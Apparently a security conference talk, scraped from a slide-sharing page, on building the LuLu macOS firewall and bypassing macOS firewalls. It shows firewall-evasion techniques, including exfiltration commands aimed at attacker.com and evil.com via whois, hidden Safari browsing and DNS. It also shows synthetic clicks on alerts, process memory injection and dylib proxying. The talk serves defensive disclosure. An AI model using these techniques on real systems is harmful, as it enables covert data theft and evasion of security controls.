The document discusses shifting the focus in cybersecurity from vulnerability management to weakness management and attack surface management. It argues that attacks persist because approaches focus only on software vulnerabilities, while ignoring other weaknesses like technological, people and process weaknesses that expand the potential attack surface. A new approach is needed that takes a holistic view of all weaknesses and continuously monitors the entire attack surface to better prevent attacks.
The document summarizes key aspects of the proposed Digital Personal Data Protection Act 2023 in India, including its scope, definitions, obligations of data fiduciaries, grounds for processing personal data, notice requirements for data principals, and penalties for non-compliance. It outlines categories of entities that would be considered significant data fiduciaries and the additional obligations that would apply to them. The summary also compares some aspects of the proposed Indian law to the General Data Protection Regulation (GDPR) in the European Union.
Cyber Truths_Are you Prepared version 1.1.pptx.pdfPriyanka Aash
This document discusses cybersecurity threats and SentinelOne's solutions. It begins with questions about an organization's cyber preparedness and budget. It then discusses the cat-and-mouse game between attackers and defenders. The document highlights growing ransomware threats and payments. It argues SentinelOne provides a unified security solution that lowers costs, risks, and complexity while improving detection and response. It shares industry recognition for SentinelOne and concludes by thanking the audience.
An IT systems outage and distributed denial of service (DDoS) attack impacted an organization called XYZ Ltd. This was followed by a ransom demand email from an anonymous sender threatening to release sensitive project data. When the ransom deadline passed, anonymous hackers released a video on social media and the data breach began receiving media coverage. A customer then contacted XYZ to inquire about the data leak and if their content was impacted. The document outlines discussions between teams at XYZ on responding to the cyber incident and lessons learned.
The CISO Platform is a 10+ year old dedicated social platform for CISOs and senior IT security leaders that has grown to over 40,000 members across 20+ countries. Through sharing and collaboration, the community has created over 500 checklists, frameworks, and playbooks that are available for free to members. The platform also hosts an annual security conference with over 100 speakers and 20 workshops attended by 20,000 people. The goal of the CISO Platform is to build tangible community goods and resources through open sharing and collaboration among security professionals.
This document provides updates from the Chennai Chapter of the CISO Platform for 2021. It discusses the following:
1. The Breach and Attack Summit held in December which included panel discussions, presentations, task forces, and workshops despite natural disasters, with over 200 attendees.
2. Chapter meetings focused on ransomware trends and lessons learned from attacks.
3. A kids initiative to promote cybersecurity awareness through sessions for students, parents and teachers at local schools.
4. The task forces focused on topics like cyber risk quantification, quantum computing, cyber insurance and privacy.
It covers popular IaaS/PaaS attack vectors, list them, and map to other relevant projects such as STRIDE & MITRE. Security professionals can better understand what are the common attack vectors that are utilized in attacks, examples for previous events, and where they should focus their controls and security efforts.
Discuss Security Incidents & Business Use Case, Understanding Web 3 Pros
and Web 3 Cons. Prevention mechanism and how to make sure that it doesn’t happen to you?
Lessons Learned From Ransomware AttacksPriyanka Aash
The document summarizes a ransomware attack experienced by the author's organization and the lessons learned. It describes how the ransomware encrypted files and powered off virtual machines. It then details the recovery process over several days, including bringing in an incident response firm, rebuilding infrastructure, and restoring service for customers. Key lessons included having stronger access controls, backups stored separately, and implementing security tools like EDR, centralized logging, and identity management best practices.
Emerging New Threats And Top CISO Priorities in 2022 (Bangalore)Priyanka Aash
Round Table Discussion On "Emerging New Threats And Top CISO Priorities In 2022"_ Bangalore
Date - 28 September, 2022. Decision Makers of different organizations joined this discussion and spoke on New Threats & Top CISO Priorities
Cloud Security: Limitations of Cloud Security Groups and Flow LogsPriyanka Aash
Cloud Security Groups are the firewalls of the cloud. They are built-in and provide basic access control functionality as part of the shared responsibility model. However, Cloud Security Groups do not provide the same protection or functionality that enterprises have come to expect with on-premises deployments. In this talk we will discuss the top cloud risks in 2020, why perimeters are a concept of the past and how in the world of no perimitiers do Cloud Security groups, the "Cloud FIrewalls", fit it. We will practically explore Cloud Security Group limitations across different cloud setups from a single vNet to multi-cloud
Most organizations have good enterprise-level security policies that define their approach to maintaining, improving, and securing their information and information systems. However, once the policies are signed by senior leadership and distributed throughout the organization, significant cybersecurity governance challenges remain. In this workshop I will explain the transforming organizational security to strengthen defenses and integrate cybersecurity with the overall approach toward security governance, risk management and compliance.
The Internet is home to seemingly infinite amounts of confidential and personal information. As a result of this mass storage of information, the system needs to be constantly updated and enforced to prevent hackers from retrieving such valuable and sensitive data. This increasing number of cyber-attacks has led to an increasing importance of Ethical Hacking. So Ethical hackers' job is to scan vulnerabilities and to find potential threats on a computer or networks. An ethical hacker finds the weakness or loopholes in a computer, web applications or network and reports them to the organization. It requires a thorough knowledge of Networks, web servers, computer viruses, SQL (Structured Query Language), cryptography, penetration testing, Attacks etc. In this session, you will learn all about ethical hacking. You will understand the what ethical hacking, Cyber- attacks, Tools and some hands-on demos. This session will also guide you with the various ethical hacking certifications available today.
Full-RAG: A modern architecture for hyper-personalizationZilliz
Mike Del Balso, CEO & Co-Founder at Tecton, presents "Full RAG," a novel approach to AI recommendation systems, aiming to push beyond the limitations of traditional models through a deep integration of contextual insights and real-time data, leveraging the Retrieval-Augmented Generation architecture. This talk will outline Full RAG's potential to significantly enhance personalization, address engineering challenges such as data management and model training, and introduce data enrichment with reranking as a key solution. Attendees will gain crucial insights into the importance of hyperpersonalization in AI, the capabilities of Full RAG for advanced personalization, and strategies for managing complex data integrations for deploying cutting-edge AI solutions.
Things to Consider When Choosing a Website Developer for your Website | FODUUFODUU
Choosing the right website developer is crucial for your business. This article covers essential factors to consider, including experience, portfolio, technical skills, communication, pricing, reputation & reviews, cost and budget considerations and post-launch support. Make an informed decision to ensure your website meets your business goals.
Generating privacy-protected synthetic data using Secludy and MilvusZilliz
During this demo, the founders of Secludy will demonstrate how their system utilizes Milvus to store and manipulate embeddings for generating privacy-protected synthetic data. Their approach not only maintains the confidentiality of the original data but also enhances the utility and scalability of LLMs under privacy constraints. Attendees, including machine learning engineers, data scientists, and data managers, will witness first-hand how Secludy's integration with Milvus empowers organizations to harness the power of LLMs securely and efficiently.
Have you ever been confused by the myriad of choices offered by AWS for hosting a website or an API?
Lambda, Elastic Beanstalk, Lightsail, Amplify, S3 (and more!) can each host websites + APIs. But which one should we choose?
Which one is cheapest? Which one is fastest? Which one will scale to meet our needs?
Join me in this session as we dive into each AWS hosting service to determine which one is best for your scenario and explain why!
GraphRAG for Life Science to increase LLM accuracyTomaz Bratanic
GraphRAG for life science domain, where you retriever information from biomedical knowledge graphs using LLMs to increase the accuracy and performance of generated answers
Building Production Ready Search Pipelines with Spark and MilvusZilliz
Spark is the widely used ETL tool for processing, indexing and ingesting data to serving stack for search. Milvus is the production-ready open-source vector database. In this talk we will show how to use Spark to process unstructured data to extract vector representations, and push the vectors to Milvus vector database for search serving.
Climate Impact of Software Testing at Nordic Testing DaysKari Kakkonen
My slides at Nordic Testing Days 6.6.2024
Climate impact / sustainability of software testing discussed on the talk. ICT and testing must carry their part of global responsibility to help with the climat warming. We can minimize the carbon footprint but we can also have a carbon handprint, a positive impact on the climate. Quality characteristics can be added with sustainability, and then measured continuously. Test environments can be used less, and in smaller scale and on demand. Test techniques can be used in optimizing or minimizing number of tests. Test automation can be used to speed up testing.
Removing Uninteresting Bytes in Software FuzzingAftab Hussain
Imagine a world where software fuzzing, the process of mutating bytes in test seeds to uncover hidden and erroneous program behaviors, becomes faster and more effective. A lot depends on the initial seeds, which can significantly dictate the trajectory of a fuzzing campaign, particularly in terms of how long it takes to uncover interesting behaviour in your code. We introduce DIAR, a technique designed to speedup fuzzing campaigns by pinpointing and eliminating those uninteresting bytes in the seeds. Picture this: instead of wasting valuable resources on meaningless mutations in large, bloated seeds, DIAR removes the unnecessary bytes, streamlining the entire process.
In this work, we equipped AFL, a popular fuzzer, with DIAR and examined two critical Linux libraries -- Libxml's xmllint, a tool for parsing xml documents, and Binutil's readelf, an essential debugging and security analysis command-line tool used to display detailed information about ELF (Executable and Linkable Format). Our preliminary results show that AFL+DIAR does not only discover new paths more quickly but also achieves higher coverage overall. This work thus showcases how starting with lean and optimized seeds can lead to faster, more comprehensive fuzzing campaigns -- and DIAR helps you find such seeds.
- These are slides of the talk given at IEEE International Conference on Software Testing Verification and Validation Workshop, ICSTW 2022.
HCL Notes and Domino License Cost Reduction in the World of DLAUpanagenda
Webinar Recording: https://www.panagenda.com/webinars/hcl-notes-and-domino-license-cost-reduction-in-the-world-of-dlau/
The introduction of DLAU and the CCB & CCX licensing model caused quite a stir in the HCL community. As a Notes and Domino customer, you may have faced challenges with unexpected user counts and license costs. You probably have questions on how this new licensing approach works and how to benefit from it. Most importantly, you likely have budget constraints and want to save money where possible. Don’t worry, we can help with all of this!
We’ll show you how to fix common misconfigurations that cause higher-than-expected user counts, and how to identify accounts which you can deactivate to save money. There are also frequent patterns that can cause unnecessary cost, like using a person document instead of a mail-in for shared mailboxes. We’ll provide examples and solutions for those as well. And naturally we’ll explain the new licensing model.
Join HCL Ambassador Marc Thomas in this webinar with a special guest appearance from Franz Walder. It will give you the tools and know-how to stay on top of what is going on with Domino licensing. You will be able lower your cost through an optimized configuration and keep it low going forward.
These topics will be covered
- Reducing license cost by finding and fixing misconfigurations and superfluous accounts
- How do CCB and CCX licenses really work?
- Understanding the DLAU tool and how to best utilize it
- Tips for common problem areas, like team mailboxes, functional/test users, etc
- Practical examples and best practices to implement right away
AI-Powered Food Delivery Transforming App Development in Saudi Arabia.pdfTechgropse Pvt.Ltd.
In this blog post, we'll delve into the intersection of AI and app development in Saudi Arabia, focusing on the food delivery sector. We'll explore how AI is revolutionizing the way Saudi consumers order food, how restaurants manage their operations, and how delivery partners navigate the bustling streets of cities like Riyadh, Jeddah, and Dammam. Through real-world case studies, we'll showcase how leading Saudi food delivery apps are leveraging AI to redefine convenience, personalization, and efficiency.
In the rapidly evolving landscape of technologies, XML continues to play a vital role in structuring, storing, and transporting data across diverse systems. The recent advancements in artificial intelligence (AI) present new methodologies for enhancing XML development workflows, introducing efficiency, automation, and intelligent capabilities. This presentation will outline the scope and perspective of utilizing AI in XML development. The potential benefits and the possible pitfalls will be highlighted, providing a balanced view of the subject.
We will explore the capabilities of AI in understanding XML markup languages and autonomously creating structured XML content. Additionally, we will examine the capacity of AI to enrich plain text with appropriate XML markup. Practical examples and methodological guidelines will be provided to elucidate how AI can be effectively prompted to interpret and generate accurate XML markup.
Further emphasis will be placed on the role of AI in developing XSLT, or schemas such as XSD and Schematron. We will address the techniques and strategies adopted to create prompts for generating code, explaining code, or refactoring the code, and the results achieved.
The discussion will extend to how AI can be used to transform XML content. In particular, the focus will be on the use of AI XPath extension functions in XSLT, Schematron, Schematron Quick Fixes, or for XML content refactoring.
The presentation aims to deliver a comprehensive overview of AI usage in XML development, providing attendees with the necessary knowledge to make informed decisions. Whether you’re at the early stages of adopting AI or considering integrating it in advanced XML development, this presentation will cover all levels of expertise.
By highlighting the potential advantages and challenges of integrating AI with XML development tools and languages, the presentation seeks to inspire thoughtful conversation around the future of XML development. We’ll not only delve into the technical aspects of AI-powered XML development but also discuss practical implications and possible future directions.
How to Get CNIC Information System with Paksim Ga.pptxdanishmna97
Pakdata Cf is a groundbreaking system designed to streamline and facilitate access to CNIC information. This innovative platform leverages advanced technology to provide users with efficient and secure access to their CNIC details.
OpenID AuthZEN Interop Read Out - AuthorizationDavid Brossard
During Identiverse 2024 and EIC 2024, members of the OpenID AuthZEN WG got together and demoed their authorization endpoints conforming to the AuthZEN API
5. The Goal
to monitor all network traffic; blocking unauthorized traffic while allowing
trusted (legitimate) connections
we'll focus on outgoing traffic (as Apple's
built-in firewall is sufficient for incoming)C&C server
malware infects system
malware attempts to connect
to C&C server or exfil data
firewall detects unauthorized
connection, alerting user
}
generically
no a priori knowledge
LuLu
github.com/objective-see/LuLu
6. Network Kernel Extensions
& socket filters
"Network kernel extensions (NKEs) provide a way to extend and modify
the networking infrastructure of OS X" -developer.apple.com
Apple's Network Kernel Extensions Programming Guide
Socket Filter (NKE)
"filter inbound or outbound traffic
on a socket" -developer.apple.com
socket operation
allowed
kernel mode
7. Registering a Socket Filter
the sflt_filter structure
"A socket filter is registered by
[first] filling out desired callbacks
in the sflt_filter structure."
OS X and iOS Kernel Programming
struct sflt_filter {
sflt_handle sf_handle;
int sf_flags;
char *sf_name;
sf_unregistered_func sf_unregistered;
sf_attach_func sf_attach;
sf_detach_func sf_detach;
sf_notify_func sf_notify;
sf_getpeername_func sf_getpeername;
sf_getsockname_func sf_getsockname;
sf_data_in_func sf_data_in;
sf_data_out_func sf_data_out;
sf_connect_in_func sf_connect_in;
sf_connect_out_func sf_connect_out;
sf_bind_func sf_bind;
sf_setoption_func sf_setoption;
sf_getoption_func sf_getoption;
....
struct sflt_filter (kpi_socketfilter.h)
int sf_flags:
set to SFLT_GLOBAL
}callbacks (optional)
attach
data in/out
detach
8. Registering a Socket Filter
the sflt_register function
extern errno_t
sflt_register(const struct sflt_filter *filter, int domain, int type, int protocol);
//register socket filter
// AF_INET domain, SOCK_STREAM type, TCP protocol
sflt_register(&tcpFilterIPV4, AF_INET, SOCK_STREAM, IPPROTO_TCP)
socket operation
invoke sflt_register() for each
domain, type, and protocol
AF_INET/SOCK_STREAM/TCP
AF_INET/SOCK_DGRAM/UDP
AF_INET6/SOCK_STREAM/TCP
etc...
registering a socker filter
9. Socket Filter Callbacks
sf_attach_func: new sockets
//callback for new sockets
static kern_return_t attach(void **cookie, socket_t so);
"The attach function...[is] called whenever [the] filter attaches
itself to a socket. This happens...when the socket is created."
OS X and iOS Kernel Programming
the socket
per socket data
static kern_return_t attach(void **cookie, socket_t so){
//alloc cookie
*cookie = (void*)OSMalloc(sizeof(struct cookieStruct), allocTag);
//save rule action
// values: allow/deny/ask
((struct cookieStruct*)(*cookie))->action = queryRule(proc_selfpid());
LuLu's attach function
10. Socket Filter Callbacks
sf_connect_out_func: outgoing connections
//callback for outgoing (TCP) connections
static kern_return_t connect_out(void *cookie, socket_t so, const struct sockaddr *to)
"sf_connect_out_func is called to filter outbound connections. A
protocol will call this before initiating an outbound connection."
kpi_socketfilter.h
the (attached) socket
per socket data
kern_return_t connect_out(void *cookie, socket_t so, const struct sockaddr *to){
//rule says 'allow'?
if(RULE_STATE_ALLOW == cookie->ruleAction)
return kIOReturnSuccess;
//rule says 'block'?
if(RULE_STATE_BLOCK == cookie->ruleAction)
return kIOReturnError;
//unknown (new) process..
LuLu's connect_out function
remote address
11. Callback: sf_connect_out_func
handling an unknown process
//nap time!
IOLockSleep(ruleEventLock, &ruleEventLock, THREAD_ABORTSAFE);
put thread to sleep
sf_connect_out_func invoked on
the thread of process connecting out!
report event to user-mode daemon via shared queue
//data queue
IOSharedDataQueue *sharedDataQueue = NULL;
//shared memory
IOMemoryDescriptor *sharedMemoryDescriptor = NULL;
//get memory descriptor
// used in `clientMemoryForType` method
sharedMemoryDescriptor = sharedDataQueue->getMemoryDescriptor();
...
//queue it up
sharedDataQueue->enqueue_tail(&event, sizeof(firewallEvent));lulu (user-mode)
12. Callback: sf_connect_out_func
handling an unknown process
daemon
daemon, passes event to login item via XPC
login item
//process alert request from client
// blocks for queue item, then sends to client
-(void)alertRequest:(void (^)(NSDictionary* alert))reply
{
//read off queue
self.dequeuedAlert = [eventQueue dequeue];
//return alert
reply(self.dequeuedAlert);
return;
}
login item displays alert
...& awaits for user's response
allowdeny!
<process> is trying to
connect to <addr>
alert
13. Callback: sf_connect_out_func
handling an unknown process
" "
user's response passed back to daemon (XPC)
daemon
save to rule database
"allow" || "block"
}kext
send to kext (iokit)
awake thread & apply response
14. Process Classification
known? unknown?
socket operation
//get process
pid_t process = proc_selfpid();
socket filter callback(s), are invoked in context of
process that initiated socket operation
lulu (user-mode)
generate code signing info
(or hash) of process
query rules database
known process?
tell kernel block/allow}
unknown process?
alert user/get response
15. LuLu
the free macOS firewall
github.com/objective-see/LuLu
full src code:
rule's window
alert
installer
17. The Goal
access the network (e.g. connect out to a malicious C&C server or exfiltrate
data) without being blocked by a firewall.
C&C server
infected host
firewall 'aware' malware
firewall (security) flaws
firewall bypasses
}
product specific generic
18. Firewall 'Aware' Malware
is a firewall detected? yah; then gtfo
"They were finally caught while attempting to upload a screenshot to one of
their own servers, according to the report. A piece of security software called
Little Snitch ... was installed on one of the information security employees’
laptops [at Palantir], and it flagged the suspicious upload attempt" -buzzfeed
$ cat Twitter1
if [ -e /System/Library/Extensions/LittleSnitch.kext ]
then
cd "$DIR"
./Twitterrific
exit 0
fi
...
OSX.DevilRobber
LittleSnitch (firewall) installed?
...yes; skip infecting the system!
red team: caught!
21. Bypassing RadioSilence
...don't trust a name!
"The easiest network monitor and firewall for Mac...Radio Silence can stop
any app from making network connections" -radiosilenceapp.com
com.radiosilenceapp.nke.filter
int _is_process_blacklisted(int arg0, int arg1)
{
return _is_process_or_ancestor_listed(r14, 0x0);
}
int _is_process_or_ancestor_listed(int arg0, int arg1)
{
//'launchd' can't be blacklisted
_proc_name(arg0, &processName, 0x11);
rax = _strncmp("launchd", &processName, 0x10);
if (rax == 0x0) goto leave;
...
return rax;
}
blacklist'ing check
22. Bypassing RadioSilence
...don't trust a name! $ ~/Desktop/launchd google.com
<HTML><BODY>
<H1>301 Moved</H1>
The document has moved
<A HREF="http://www.google.com/">here</A>.
</BODY></HTML>
bypass:
name malware: 'launchd'
blacklist malware
...still connects out!
23. Bypassing HandsOff
...don't trust a click!
"Keep an eye on Internet connections from all applications as to expose the
hidden connections. Prevent them from sending data without your consent"
-handsoff
$ curl google.com
Allow
" "
void bypass(float X, float Y){
//clicky clicky
CGPostMouseEvent(CGPointMake(X, Y), true, 1, true);
CGPostMouseEvent(CGPointMake(X, Y), true, 1, false);
}
synthetic click
<HTML><HEAD>
<TITLE>301 Moved</TITLE>
24. Bypassing LuLu
...don't trust a system utility!
"the free macOS firewall that aims to block unauthorized (outgoing) network
traffic" -lulu
//apple utils
// may be abused, so trigger an alert
NSString* const GRAYLISTED_BINARIES[] =
{
@"com.apple.nc",
@"com.apple.curl",
@"com.apple.ruby",
@"com.apple.perl",
@"com.apple.perl5",
@"com.apple.python",
@"com.apple.python2",
@"com.apple.pythonw",
@"com.apple.openssh",
@"com.apple.osascript"
};
is there an(other) system
utility that we can abuse? LuLu's 'graylist'
25. Bypassing LuLu
...don't trust a system utility!
$ echo "exfil this data" > exfil.txt
$ RHOST=attacker.com
$ RPORT=12345
$ LFILE=file_to_send
$ whois -h $RHOST -p $RPORT "`cat $LFILE`"
LuLu(105):
due to preferences, allowing apple
process: /usr/bin/whois
LuLu(105): adding rule for /usr/bin/whois
({
signedByApple = 1;
signingIdentifier = "com.apple.whois";
}): action: ALLOW
exfil via 'whois'
via @info_dox
LuLu (debug) log
...traffic (silently) allowed
26. Bypassing LittleSnitch
...don't trust a domain!
$ curl https://setup.icloud.com/setup/ws/1/login
{"success":false,"error":"Invalid ... header"}
curl little snitch (kext)
*.icloud.com
28. Generic Bypasses
regardless of firewall product: connect out
goal: access the network (e.g. connect to a malicious C&C server or
exfiltrate data) without being blocked by (any) firewall.
firewalls are inherently disadvantaged
...must allow certain network traffic!
system functionality
(dns, os updates, etc.)
'usability'
(browsers, chat clients, etc.)
}
passively determine what's allowed
abuse these trusted protocols/processes to
generically bypass any installed firewall
29. Generic Bypasses
what traffic is allowed?
$ lsof -i TCP -sTCP:ESTABLISHED
Google Chrome
patricks-mbp.lan:58107->ec2-107-21-125-119.compute-1.amazonaws.com:https
Signal
patricks-mbp.lan:58098->ec2-52-2-222-12.compute-1.amazonaws.com:https
Slack
patricks-mbp.lan:58071->151.101.196.102:https
VMware
patricks-mbp.lan:62676->a23-55-114-98.deploy.static.akamaitechnologies.com:https
com.apple.WebKit.Networking (Safari)
patricks-mbp.lan:58189->a23-55-116-179.deploy.static.akamaitechnologies.com:https
Core Sync.app
patricks-mbp.lan:58195->ec2-52-5-250-175.compute-1.amazonaws.com:https
Creative Cloud.app
patricks-mbp.lan:57194->ec2-52-2-42-38.compute-1.amazonaws.com:https
GitHub
patricks-mbp.lan:58119->lb-192-30-255-116-sea.github.com:https
}
lsof output (user processes)
what's allowed!?
31. Abusing DNS
int main(int argc, const char * argv[]) {
struct addrinfo *result = {0};
//'resolve' DNS
// this is routed to mDNSResponder
getaddrinfo(argv[1], NULL, NULL, &result);
....
resolve
'data.to.exfilatrate.evil.com'
responseencode tasking in A* records
HandsOff (in advanced mode) tracks DNS resolutions, but NOT
"DNS Service Discovery" (DNS-SD, see: /usr/include/dns_sd.h)
32. Abusing Browsers
synthetic browsing via AppleScript
"A browser that is not afforded indiscriminate network
access (at least to remote web severs) is rather useless"
tell application "Safari"
run
tell application "Finder" to set visible of process "Safari" to false
make new document
set the URL of document 1 to
"http://attacker.com?data=data%20to%20exfil"
end tell
invisible
exfil data
34. Abusing Code/Dylib Injections
any code in a trusted process, is trusted
any code running in the context of process trusted
('allowed') by a firewall, will inherit that same trust!
injection
methods
of injection:
write to remote memory
malicious plugins
dylib proxying
environment variables
targets:
3rd-party apps
35. Abusing Code/Dylib Injections
writing to remote memory
//get task ports via 'processor_set_tasks'
processor_set_default(myhost, &psDefault);
host_processor_set_priv(myhost, psDefault, &psDefault_control);
processor_set_tasks(psDefault_control, &tasks, &numTasks);
//find process's task port
// then (as a poc) remotely allocate some memory
for(i = 0; i < numTasks; i++) {
pid_for_task(tasks[i], &pid);
if (pid == targetPID)
{
mach_vm_address_t remoteMem = NULL;
mach_vm_allocate(tasks[i], &remoteMem,
1024, VM_FLAGS_ANYWHERE);
//now write & exec injected shellcode
"Who needs task_for_pid() anyway..."
-(j. levin)
# ps aux | grep Slack
patrick 36308 /Applications/Slack.app
# lsof -p 36308 | grep TCP
Slack TCP patricks-mbp.lan:57408 ->
ec2-52-89-46.us-west-2.compute.amazonaws.com
# ./getTaskPort -p 36308
getting task port for Slack (pid: 36308)
got task: 0xa703
allocated remote memory @0x109b4e000
...
'traditional' injection
37. Abusing Code/Dylib Injections
dylib proxying
LC_LOAD_DYLIB:
/Applications/<some app>/<some>.dylib
note, due to System Integrity Protection (SIP)
one cannot replace/proxy system dynamic libraries.
LC_LOAD_DYLIB:
/Applications/<some app>/<some>.dylib
38. Abusing Code/Dylib Injections
dylib proxying
in two easy steps
copy original dylib
replace original dylib
-Xlinker
-reexport_library
<path to legit dylib>
re-export symbols!
$ install_name_tool -change
<existing value of LC_REEXPORT_DYLIB>
<new value for to LC_REEXPORT_DYLIB (e.g target dylib)>
<path to dylib to update>
39. Kernel-based Bypasses
in ring-0, no one can stop you!
static kern_return_t attach( ... )
{
...
//don't mess w/ kernel sockets
if(0 == proc_selfpid())
{
//allow
result = kIOReturnSuccess;
goto bail;
}
traffic from the kernel is generally (allowed) trusted
allowing kernel traffic (LuLu)
40. Kernel-based Bypasses
in ring-0, no one can stop you!
kernel mode
"Different possibilities exist to hide our network
connections from Little Snitch and also Apple's
application firewall.
The easiest one is to patch or hook the sf_attach
callback." -fG! (@osxreverser)
patch callbacks
remove callbacks
41. Kernel-based Bypasses
ok, how do we get into the kernel?
get root
'bring' & load buggy kext
exploit to run unsigned kernel code(buggy) kext still
validly signed!
code loaded into the kernel (i.e. kexts) must be
signed...and Apple rarely hands out kext signing certs!
SlingShot APT (Windows)
42. Kernel-based Bypasses
ok, how do we get into the kernel?
"macOS High Sierra 10.13 introduces a new feature that
requires user approval before loading new third-party
kernel extensions." -apple
" "
fixed?
bypass with synthetic event
[0day] "The Mouse is Mightier than the Sword" (DefCon, Sunday 10AM)
Apple: yes, 100% fixed
Patrick: nope, it's not!!
44. macOS Firewalls
kernel socket filter
} bugs
bypasses
firewalls are not enough!
use other host-based security products
use network-based security products
making:
breaking:
45. ...ok, one more last thing!
"Objective by the Sea" conference
ObjectiveByTheSea.com
Maui, Hawaii
Nov 3rd/4th
All things macOS
malware
bugs
security
Free for
Objective-See patrons!